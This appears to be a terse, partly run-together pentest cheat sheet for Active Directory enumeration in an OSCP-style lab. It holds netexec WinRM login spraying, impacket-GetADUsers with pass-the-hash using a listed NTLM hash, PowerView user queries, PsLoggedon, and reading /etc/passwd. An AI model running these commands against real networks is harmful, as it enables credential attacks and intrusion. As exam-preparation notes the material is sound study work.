wmic computersystem get domain
nslookup NAMEnetexec winrm -u test -p test --continue-on-success $(cat host-dmz.txt)# Always do this if possible
Get-NetUser | select samaccountname,useraccountcontrol,ServicePrincipalName
# Else
## w/ PtH
impacket-GetADUsers -all -dc-ip 10.10.121.140 -hashes :e728ecbadfb02f51ce8eed753f3ff3fd oscp.exam/celia.almeda
## w/ Password
impacket-GetADUsers -all -dc-ip 10.10.121.140 oscp.exam/celia.almeda:PASS
user: → “Member Of”user: → “Local Admin Privileges”Pwn3d! displayed in crackmapexec.\\PsLoggedon.exe -accepteula \\\\HOSTuser: → “Execution Privileges”useraccountcontrol columnWindows
Get-LocalUser (only Enabled)net user NAMELinux
cat /etc/passwd (only remarkable ones)id NAME